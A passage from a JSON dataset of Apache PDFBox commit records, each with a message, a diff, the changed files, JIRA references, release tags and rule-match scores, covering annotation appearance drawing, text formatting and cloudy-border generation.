"+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.layout;", - "+", - "+import java.io.IOException;", - "+import java.util.List;", - "+", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Line;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Paragraph;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.TextAttribute;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.layout.PlainText.Word;", - "+", - "+/**", - "+ * TextFormatter to handle plain text formatting.", - "+ * ", - "+ * The text formatter will take a single value or an array of values which", - "+ * are treated as paragraphs.", - "+ */", - "+", - "+class PlainTextFormatter", - "+{", - "+ ", - "+ enum TextAlign", - "+ {", - "+ LEFT(0), CENTER(1), RIGHT(2), JUSTIFY(4);", - "+ ", - "+ private final int alignment;", - "+ ", - "+ private TextAlign(int alignment)", - "+ {", - "+ this.alignment = alignment;", - "+ }", - "+ ", - "+ int getTextAlign()", - "+ {", - "+ return alignment;", - "+ }", - "+ ", - "+ public static TextAlign valueOf(int alignment)", - "+ {", - "+ for (TextAlign textAlignment : TextAlign.values())", - "+ {", - "+ if (textAlignment.getTextAlign() == alignment)", - "+ {", - "+ return textAlignment;", - "+ }", - "+ }", - "+ return TextAlign.LEFT;", - "+ }", - "+ }", - "+", - "+ /**", - "+ * The scaling factor for font units to PDF units", - "+ */", - "+ private static final int FONTSCALE = 1000;", - "+ ", - "+ private final AppearanceStyle appearanceStyle;", - "+ private final boolean wrapLines;", - "+ private final float width;", - "+ ", - "+ private final PDAppearanceContentStream contents;", - "+ private final PlainText textContent;", - "+ private final TextAlign textAlignment;", - "+ ", - "+ private float horizontalOffset;", - "+ private float verticalOffset;", - "+ ", - "+ static class Builder", - "+ {", - "+", - "+ // required parameters", - "+ private PDAppearanceContentStream contents;", - "+", - "+ // optional parameters", - "+ private AppearanceStyle appearanceStyle;", - "+ private boolean wrapLines = false;", - "+ private float width = 0f;", - "+ private PlainText textContent;", - "+ private TextAlign textAlignment = TextAlign.LEFT;", - "+ ", - "+ ", - "+ // initial offset from where to start the position of the first line", - "+ private float horizontalOffset = 0f;", - "+ private float verticalOffset = 0f;", - "+ ", - "+ Builder(PDAppearanceContentStream contents)", - "+ {", - "+ this.contents = contents;", - "+ }", - "+", - "+ Builder style(AppearanceStyle appearanceStyle)", - "+ {", - "+ this.appearanceStyle = appearanceStyle;", - "+ return this;", - "+ }", - "+ ", - "+ Builder wrapLines(boolean wrapLines)", - "+ {", - "+ this.wrapLines = wrapLines;", - "+ return this;", - "+ }", - "+", - "+ Builder width(float width)", - "+ {", - "+ this.width = width;", - "+ return this;", - "+ }", - "+", - "+ Builder textAlign(int alignment)", - "+ {", - "+ this.textAlignment = TextAlign.valueOf(alignment);", - "+ return this;", - "+ }", - "+ ", - "+ Builder textAlign(TextAlign alignment)", - "+ {", - "+ this.textAlignment = alignment;", - "+ return this;", - "+ }", - "+ ", - "+ ", - "+ Builder text(PlainText textContent)", - "+ {", - "+ this.textContent = textContent;", - "+ return this;", - "+ }", - "+ ", - "+ Builder initialOffset(float horizontalOffset, float verticalOffset)", - "+ {", - "+ this.horizontalOffset = horizontalOffset;", - "+ this.verticalOffset = verticalOffset;", - "+ return this;", - "+ }", - "+ ", - "+ PlainTextFormatter build()", - "+ {", - "+ return new PlainTextFormatter(this);", - "+ }", - "+ }", - "+ ", - "+ private PlainTextFormatter(Builder builder)", - "+ {", - "+ appearanceStyle = builder.appearanceStyle;", - "+ wrapLines = builder.wrapLines;", - "+ width = builder.width;", - "+ contents = builder.contents;", - "+ textContent = builder.textContent;", - "+ textAlignment = builder.textAlignment;", - "+ horizontalOffset = builder.horizontalOffset;", - "+ verticalOffset = builder.verticalOffset;", - "+ }", - "+ ", - "+ /**", - "+ * Format the text block.", - "+ * ", - "+ * @throws IOException if there is an error writing to the stream.", - "+ */", - "+ public void format() throws IOException", - "+ {", - "+ if (textContent != null && !textContent.getParagraphs().isEmpty())", - "+ {", - "+ boolean isFirstParagraph = true;", - "+ \tfor (Paragraph paragraph : textContent.getParagraphs())", - "+ {", - "+ if (wrapLines)", - "+ {", - "+ List lines = paragraph.getLines(", - "+ appearanceStyle.getFont(), ", - "+ appearanceStyle.getFontSize(), ", - "+ width", - "+ );", - "+ processLines(lines, isFirstParagraph);", - "+ isFirstParagraph = false;", - "+ }", - "+ else", - "+ {", - "+ float startOffset = 0f;", - "+ ", - "+ ", - "+ float lineWidth = appearanceStyle.getFont().getStringWidth(paragraph.getText()) *", - "+ appearanceStyle.getFontSize() / FONTSCALE;", - "+ ", - "+ if (lineWidth < width) ", - "+ {", - "+ switch (textAlignment)", - "+ {", - "+ case CENTER:", - "+ startOffset = (width - lineWidth)/2;", - "+ break;", - "+ case RIGHT:", - "+ startOffset = width - lineWidth;", - "+ break;", - "+ case JUSTIFY:", - "+ default:", - "+ startOffset = 0f;", - "+ }", - "+ }", - "+ ", - "+ contents.newLineAtOffset(horizontalOffset + startOffset, verticalOffset);", - "+ contents.showText(paragraph.getText());", - "+ }", - "+ }", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Process lines for output. ", - "+ *", - "+ * Process lines for an individual paragraph and generate the ", - "+ * commands for the content stream to show the text.", - "+ * ", - "+ * @param lines the lines to process.", - "+ * @throws IOException if there is an error writing to the stream.", - "+ */", - "+ private void processLines(List lines, boolean isFirstParagraph) throws IOException", - "+ {", - "+ float wordWidth = 0f;", - "+", - "+ float lastPos = 0f;", - "+ float startOffset = 0f;", - "+ float interWordSpacing = 0f;", - "+ ", - "+ for (Line line : lines)", - "+ {", - "+ switch (textAlignment)", - "+ {", - "+ case CENTER:", - "+ startOffset = (width - line.getWidth())/2;", - "+ break;", - "+ case RIGHT:", - "+ startOffset = width - line.getWidth();", - "+ break;", - "+ case JUSTIFY:", - "+ if (lines.indexOf(line) != lines.size() -1)", - "+ {", - "+ interWordSpacing = line.getInterWordSpacing(width);", - "+ }", - "+ break;", - "+ default:", - "+ startOffset = 0f;", - "+ }", - "+ ", - "+ float offset = -lastPos + startOffset + horizontalOffset;", - "+ ", - "+ if (lines.indexOf(line) == 0 && isFirstParagraph)", - "+ {", - "+ contents.newLineAtOffset(offset, verticalOffset);", - "+ }", - "+ else", - "+ {", - "+ // keep the last position", - "+ verticalOffset = verticalOffset - appearanceStyle.getLeading();", - "+ contents.newLineAtOffset(offset, - appearanceStyle.getLeading());", - "+ }", - "+", - "+ lastPos += offset; ", - "+", - "+ List words = line.getWords();", - "+ for (Word word : words)", - "+ {", - "+ contents.showText(word.getText());", - "+ wordWidth = (Float) word.getAttributes().getIterator().getAttribute(TextAttribute.WIDTH);", - "+ if (words.indexOf(word) != words.size() -1)", - "+ {", - "+ contents.newLineAtOffset(wordWidth + interWordSpacing, 0f);", - "+ lastPos = lastPos + wordWidth + interWordSpacing;", - "+ }", - "+ }", - "+ }", - "+ horizontalOffset = horizontalOffset - lastPos;", - "+ }", - "+}" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4212": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4212", - "relevance": 2 - } - ] - }, - { - "commit_id": "8a83632171863ba52fda21eeec4ceb2232cbc721", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530732425, - "hunks": 1, - "message": "PDFBOX-4242: fix javadoc git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835081 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index dd5c7255c..f2e225997 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -203,4 +203,4 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " * @param closeTTF whether to close the ttf parameter after embedding. Must be true when the ttf", - "- * parameter was created in the load(), false when the ttf parameter was passed to the load()", - "- * method.", - "+ * parameter was created in the load() method, false when the ttf parameter was passed to the", - "+ * load() method.", - " * @param vertical" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4242": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4242", - "relevance": 2 - } - ] - }, - { - "commit_id": "f2db0f33b3566b98418065bbe238fcd5e05ce11c", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530207055, - "hunks": 4, - "message": "PDFBOX-3353: correct drawing of /Comment, use outer shape only, prepaint area with CA ca 0.6, draw rectangle in reverse order to get donut effect, make width thicker git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834631 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 5c49ce015..42a52117e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -597,8 +597,18 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.setLineCapStyle(0);", - "- contentStream.setLineWidth(0.59f); // value from Adobe", - "+ contentStream.setLineWidth(200);", - "+ // Adobe first fills a white rectangle with CA ca 0.6, so do we", - "+ contentStream.saveGraphicsState();", - "+ contentStream.setLineWidth(1);", - "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", - "+ gs.setAlphaSourceFlag(false);", - "+ gs.setStrokingAlphaConstant(0.6f);", - "+ gs.setNonStrokingAlphaConstant(0.6f);", - "+ gs.setBlendMode(BlendMode.NORMAL);", - "+ contentStream.setGraphicsStateParameters(gs);", - "+ contentStream.setNonStrokingColor(1f);", - " contentStream.addRect(0.3f, 0.3f, 18-0.6f, 18-0.6f);", - "- contentStream.stroke();", - "+ contentStream.fill();", - "+ contentStream.restoreGraphicsState();", - "- contentStream.setNonStrokingColor(0);", - " contentStream.transform(Matrix.getScaleInstance(0.003f, 0.003f));", - "@@ -606,3 +616,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // shape from Font Awesome by \"printing\" comment.svg into a PDF", - "+ // outer shape from Font Awesome by \"printing\" comment.svg into a PDF", - " contentStream.moveTo(2549, 5269);", - "@@ -618,15 +628,10 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.closePath();", - "- contentStream.moveTo(2549, 2035);", - "- contentStream.curveTo(2315, 2035, 2083, 2071, 1860, 2141);", - "- contentStream.lineTo(1661, 2204);", - "- contentStream.lineTo(1490, 2083);", - "- contentStream.curveTo(1364, 1994, 1192, 1895, 984, 1828);", - "- contentStream.curveTo(1048, 1935, 1111, 2054, 1159, 2182);", - "- contentStream.lineTo(1252, 2429);", - "- contentStream.lineTo(1071, 2620);", - "- contentStream.curveTo(912, 2790, 721, 3070, 721, 3441);", - "- contentStream.curveTo(721, 4216, 1541, 4847, 2549, 4847);", - "- contentStream.curveTo(3558, 4847, 4378, 4216, 4378, 3441);", - "- contentStream.curveTo(4378, 2666, 3558, 2035, 2549, 2035);", - "- contentStream.fill();", - "+", - "+ // can't use addRect: if we did that, we wouldn't get the donut effect", - "+ contentStream.moveTo(0.3f / 0.003f - 500, 0.3f / 0.003f + 300);", - "+ contentStream.lineTo(0.3f / 0.003f - 500, 0.3f / 0.003f + 300 + 17.4f / 0.003f);", - "+ contentStream.lineTo(0.3f / 0.003f - 500 + 17.4f / 0.003f, 0.3f / 0.003f + 300 + 17.4f / 0.003f);", - "+ contentStream.lineTo(0.3f / 0.003f - 500 + 17.4f / 0.003f, 0.3f / 0.003f + 300);", - "+", - "+ contentStream.closeAndFillAndStroke();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "49254d2d8bafa7ea4f95ae5dd1dcffdaae557492", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527529586, - "hunks": 18, - "message": "PDFBOX-3353: move drawing of callout line before rectangle drawing; extract non stroking color from /DA which Adobe uses as stroking color git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832412 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 6cd839ea9..08631c951 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -21,2 +21,9 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.fontbox.util.Charsets;", - "+import org.apache.pdfbox.contentstream.PDFStreamEngine;", - "+import org.apache.pdfbox.contentstream.operator.Operator;", - "+import org.apache.pdfbox.cos.COSArray;", - "+import org.apache.pdfbox.cos.COSBase;", - "+import org.apache.pdfbox.cos.COSObject;", - "+import org.apache.pdfbox.pdfparser.PDFStreamParser;", - " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "@@ -24,3 +31,5 @@ import org.apache.pdfbox.pdmodel.common.PDRectangle;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceCMYK;", - " import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceGray;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDDeviceRGB;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - "@@ -64,3 +73,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " AnnotationBorder ab = AnnotationBorder.getAnnotationBorder(annotation, annotation.getBorderStyle());", - "- PDColor color = annotation.getColor();", - "@@ -76,7 +84,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- if (color == null || color.getComponents().length == 0)", - "- {", - "- //TODO remove this when we've managed to parse /DA", - "- color = new PDColor(new float[]{0}, PDDeviceGray.INSTANCE);", - "- }", - "@@ -84,3 +87,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "-", - " try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", - "@@ -91,4 +93,6 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- //TODO Adobe uses the last non stroking color from /DA as stroking color. WTF????", - "- boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "+ // Adobe uses the last non stroking color from /DA as stroking color!", - "+ PDColor strokingColor = extractNonStrokingColor(annotation);", - "+ boolean hasStroke = cs.setStrokingColorOnDemand(strokingColor);", - "+", - " if (ab.dashArray != null)", - "@@ -99,2 +103,53 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ // draw callout line(s)", - "+ // must be done before retangle paint to avoid a line cutting through cloud", - "+ // see CTAN-example-Annotations.pdf", - "+ for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ {", - "+ float x = pathsArray[i * 2];", - "+ float y = pathsArray[i * 2 + 1];", - "+ if (i == 0)", - "+ {", - "+ if (SHORT_STYLES.contains(annotation.getLineEndingStyle()))", - "+ {", - "+ // modify coordinate to shorten the segment", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float x1 = pathsArray[2];", - "+ float y1 = pathsArray[3];", - "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "+ if (Float.compare(len, 0) != 0)", - "+ {", - "+ x += (x1 - x) / len * ab.width;", - "+ y += (y1 - y) / len * ab.width;", - "+ }", - "+ }", - "+ cs.moveTo(x, y);", - "+ }", - "+ else", - "+ {", - "+ cs.lineTo(x, y);", - "+ }", - "+ }", - "+ cs.stroke();", - "+", - "+ // do a transform so that first \"arm\" is imagined flat, like in line handler", - "+ // the alternative would be to apply the transform to the LE shapes directly,", - "+ // which would be more work and produce code difficult to understand", - "+ // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", - "+ if (\"FreeTextCallout\".equals(annotation.getIntent())", - "+ && !LE_NONE.equals(annotation.getLineEndingStyle())", - "+ && pathsArray.length >= 4)", - "+ {", - "+ // check only needed to avoid q cm Q if LE_NONE", - "+ float x2 = pathsArray[2];", - "+ float y2 = pathsArray[3];", - "+ float x1 = pathsArray[0];", - "+ float y1 = pathsArray[1];", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.saveGraphicsState();", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ cs.restoreGraphicsState();", - "+ }", - "+", - "@@ -185,24 +240,47 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ LOG.error(ex);", - "+ }", - "+ }", - "- // draw callout line(s)", - "- for (int i = 0; i < pathsArray.length / 2; ++i)", - "+ // get the last non stroking color from the /DA entry", - "+ private PDColor extractNonStrokingColor(PDAnnotationFreeText annotation)", - "+ {", - "+ // It could also work with a regular expression, but that should be written so that", - "+ // \"/LucidaConsole 13.94766 Tf .392 .585 .93 rg\" does not produce \"2 .585 .93 rg\" as result", - "+ // Another alternative might be to create a PDDocument and a PDPage with /DA content as /Content,", - "+ // process the whole thing and then get the non stroking color.", - "+", - "+ PDColor strokingColor = new PDColor(new float[]{0}, PDDeviceGray.INSTANCE);", - "+ String defaultAppearance = annotation.getDefaultAppearance();", - "+ if (defaultAppearance == null)", - "+ {", - "+ return strokingColor;", - "+ }", - "+", - "+ try", - "+ {", - "+ // not sure if charset is correct, but we only need numbers and simple characters", - "+ PDFStreamParser parser = new PDFStreamParser(defaultAppearance.getBytes(Charsets.US_ASCII));", - "+ COSArray arguments = new COSArray();", - "+ COSArray colors = null;", - "+ Operator graphicOp = null;", - "+ for (Object token = parser.parseNextToken(); token != null; token = parser.parseNextToken())", - " {", - "- float x = pathsArray[i * 2];", - "- float y = pathsArray[i * 2 + 1];", - "- if (i == 0)", - "+ if (token instanceof COSObject)", - " {", - "- if (SHORT_STYLES.contains(annotation.getLineEndingStyle()))", - "+ arguments.add(((COSObject) token).getObject());", - "+ }", - "+ else if (token instanceof Operator)", - "+ {", - "+ Operator op = (Operator) token;", - "+ String name = op.getName();", - "+ if (\"g\".equals(name) || \"rg\".equals(name) || \"k\".equals(name))", - " {", - "- // modify coordinate to shorten the segment", - "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "- float x1 = pathsArray[2];", - "- float y1 = pathsArray[3];", - "- float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "- if (Float.compare(len, 0) != 0)", - "- {", - "- x += (x1 - x) / len * ab.width;", - "- y += (y1 - y) / len * ab.width;", - "- }", - "+ graphicOp = op;", - "+ colors = arguments;", - " }", - "- cs.moveTo(x, y);", - "+ arguments = new COSArray();", - " }", - "@@ -210,23 +288,21 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- cs.lineTo(x, y);", - "+ arguments.add((COSBase) token);", - " }", - " }", - "- cs.stroke();", - "-", - "- // do a transform so that first \"arm\" is imagined flat, like in line handler", - "- // the alternative would be to apply the transform to the LE shapes directly,", - "- // which would be more work and produce code difficult to understand", - "- // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", - "- if (\"FreeTextCallout\".equals(annotation.getIntent())", - "- && !LE_NONE.equals(annotation.getLineEndingStyle())", - "- && pathsArray.length >= 4)", - "+ if (graphicOp != null)", - " {", - "- // check only needed to avoid q cm Q if LE_NONE", - "- float x2 = pathsArray[2];", - "- float y2 = pathsArray[3];", - "- float x1 = pathsArray[0];", - "- float y1 = pathsArray[1];", - "- double angle = Math.atan2(y2 - y1, x2 - x1);", - "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "- drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ switch (graphicOp.getName())", - "+ {", - "+ case \"g\":", - "+ strokingColor = new PDColor(colors, PDDeviceGray.INSTANCE);", - "+ break;", - "+ case \"rg\":", - "+ strokingColor = new PDColor(colors, PDDeviceRGB.INSTANCE);", - "+ break;", - "+ case \"k\":", - "+ strokingColor = new PDColor(colors, PDDeviceCMYK.INSTANCE);", - "+ break;", - "+ default:", - "+ break;", - "+ }", - " }", - "@@ -235,4 +311,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- LOG.error(ex);", - "+ LOG.warn(\"Problem parsing /DA, will use default black\", ex);", - " }", - "+ return strokingColor;", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "be5a1b3bf20a54814acd7812b6c820029a275507", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524674477, - "hunks": 16, - "message": "PDFBOX-3353: add creation of cloudy borders, by Jani Pehkonen git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830098 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "new file mode 100644", - "index 000000000..19ad102f5", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "@@ -0,0 +1,1087 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "+", - "+import java.awt.geom.AffineTransform;", - "+import java.awt.geom.Ellipse2D;", - "+import java.awt.geom.PathIterator;", - "+import java.awt.geom.Point2D;", - "+import java.io.IOException;", - "+import java.util.ArrayList;", - "+", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+", - "+/**", - "+ * Generates annotation appearances with a cloudy border.", - "+ *

    ", - "+ * Dashed stroke styles are not recommended with cloudy borders. The result would", - "+ * not look good because some parts of the arcs are traced twice by the stroked", - "+ * path. Actually Acrobat Reader's line style dialog does not allow to choose a", - "+ * dashed and a cloudy style at the same time.", - "+ */", - "+", - "+class CloudyBorder", - "+{", - "+ private static final double ANGLE_180_DEG = Math.PI;", - "+ private static final double ANGLE_90_DEG = Math.PI / 2;", - "+ private static final double ANGLE_34_DEG = Math.toRadians(34);", - "+ private static final double ANGLE_12_DEG = Math.toRadians(12);", - "+", - "+ private final PDAppearanceContentStream output;", - "+ private final PDRectangle annotRect;", - "+ private final double intensity;", - "+ private final double lineWidth;", - "+ private PDRectangle rectWithDiff;", - "+ private boolean outputStarted = false;", - "+ private double bboxMinX;", - "+ private double bboxMinY;", - "+ private double bboxMaxX;", - "+ private double bboxMaxY;", - "+", - "+ /**", - "+ * Creates a new CloudyBorder that writes to the specified", - "+ * content stream.", - "+ *", - "+ * @param stream content stream", - "+ * @param intensity intensity of cloudy effect (entry I); typically 1.0 or 2.0", - "+ * @param lineWidth line width for annotation border (entry W)", - "+ * @param rect annotation rectangle (entry Rect)", - "+ */", - "+ CloudyBorder(PDAppearanceContentStream stream, double intensity,", - "+ double lineWidth, PDRectangle rect)", - "+ {", - "+ this.output = stream;", - "+ this.intensity = intensity;", - "+ this.lineWidth = lineWidth;", - "+ this.annotRect = rect;", - "+ }", - "+", - "+ /**", - "+ * Creates a cloudy border for a rectangular annotation.", - "+ * The rectangle is specified by the RD entry and the", - "+ * Rect entry that was passed in to the constructor.", - "+ *

    ", - "+ * This can be used for Square and FreeText annotations. However, this does", - "+ * not produce the text and the callout line for FreeTexts.", - "+ *", - "+ * @param rd entry RD, or null if the entry does not exist", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ void createCloudyRectangle(PDRectangle rd) throws IOException", - "+ {", - "+ rectWithDiff = applyRectDiff(rd, lineWidth / 2);", - "+ double left = rectWithDiff.getLowerLeftX();", - "+ double bottom = rectWithDiff.getLowerLeftY();", - "+ double right = rectWithDiff.getUpperRightX();", - "+ double top = rectWithDiff.getUpperRightY();", - "+", - "+ cloudyRectangleImpl(left, bottom, right, top, false);", - "+ finish();", - "+ }", - "+", - "+ /**", - "+ * Creates a cloudy border for a Polygon annotation.", - "+ *", - "+ * @param path polygon path", - "+ * @throws IOException If there is an error writing to the stream.", - "+ */", - "+ void createCloudyPolygon(float[][] path) throws IOException", - "+ {", - "+ int n = path.length;", - "+ Point2D.Double[] polygon = new Point2D.Double[n];", - "+", - "+ for (int i = 0; i < n; i++)", - "+ {", - "+ float[] array = path[i];", - "+ if (array.length == 2)", - "+ {", - "+ polygon[i] = new Point2D.Double(array[0], array[1]);", - "+ }", - "+ else if (array.length == 6)", - "+ {", - "+ // TODO Curve segments are not yet supported in cloudy border.", - "+ polygon[i] = new Point2D.Double(array[4], array[5]);", - "+ }", - "+ }", - "+", - "+ cloudyPolygonImpl(polygon, false);", - "+ finish();", - "+ }", - "+", - "+ /**", - "+ * Creates a cloudy border for a Circle 